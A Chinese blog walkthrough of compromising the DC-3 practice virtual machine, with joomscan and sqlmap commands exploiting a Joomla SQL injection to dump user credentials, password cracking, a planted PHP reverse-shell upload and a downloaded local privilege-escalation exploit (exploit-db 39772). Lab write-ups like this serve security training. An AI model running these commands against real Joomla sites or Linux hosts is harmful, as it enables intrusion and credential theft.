DC-3靶机渗透

最新推荐文章于 2024-08-02 14:25:04 发布

退至众人身后.

最新推荐文章于 2024-08-02 14:25:04 发布

阅读量681

点赞数

文章标签： linux 安全

本文链接：https://blog.csdn.net/weixin_45442394/article/details/106748544

版权

1 获取ip
开机前一直按shift或Esc键
在这里插入图片描述
ro recovery nomodeset改为quiet splash rw init=/bin/bash

更改后按F10

重启虚拟机

2 端口扫描

3 服务确认

4 网站目录扫描

5 查看页面

joomscan扫描
joomscan --url http://192.168.182.139 -ec

查看版本漏洞
在这里插入图片描述
查看文档

6 SQL注入
数据库名
sqlmap -u “http://192.168.182.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

表名
sqlmap -u “http://192.168.182.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
在这里插入图片描述
字段名
sqlmap -u “http://192.168.182.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D joomladb -T ‘#__users’ --columns -p list[fullordering]

用户名、密码
sqlmap -u “http://192.168.182.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D joomladb -T ‘#__users’ -C ‘name,password’ --dump -p list[fullordering]
在这里插入图片描述
john解密

7 登录查找上传点

新建文件rsj.php

访问http://192.168.182.139/templates/beez3/rsj.php，监听4444端口

8 提权

查看版本漏洞

查看文件
cat /usr/share/exploitdb/exploits/linux/local/39772.txt

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
下载解压 unzip 39772.zip，exploit.tar放在/var/www/html目录下
开启apache2
/etc/init.d/apache2 start
在这里插入图片描述
tar -xvf exploit.tar

先执行compile.sh，生成doubleput
执行doubleput

退至众人身后.

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
2
评论
DC-3靶机渗透

1 获取ip开机前一直按shift或Esc键ro recovery nomodeset改为quiet splash rw init=/bin/bash更改后按F10重启虚拟机2 端口扫描3 服务确认4 网站目录扫描5 查看页面joomscan扫描joomscan --url http://192.168.182.139 -ec查看版本漏洞查看文档6 SQL注入数据库名sqlmap -u “http://192.168.182.139/index.php?o
复制链接

扫一扫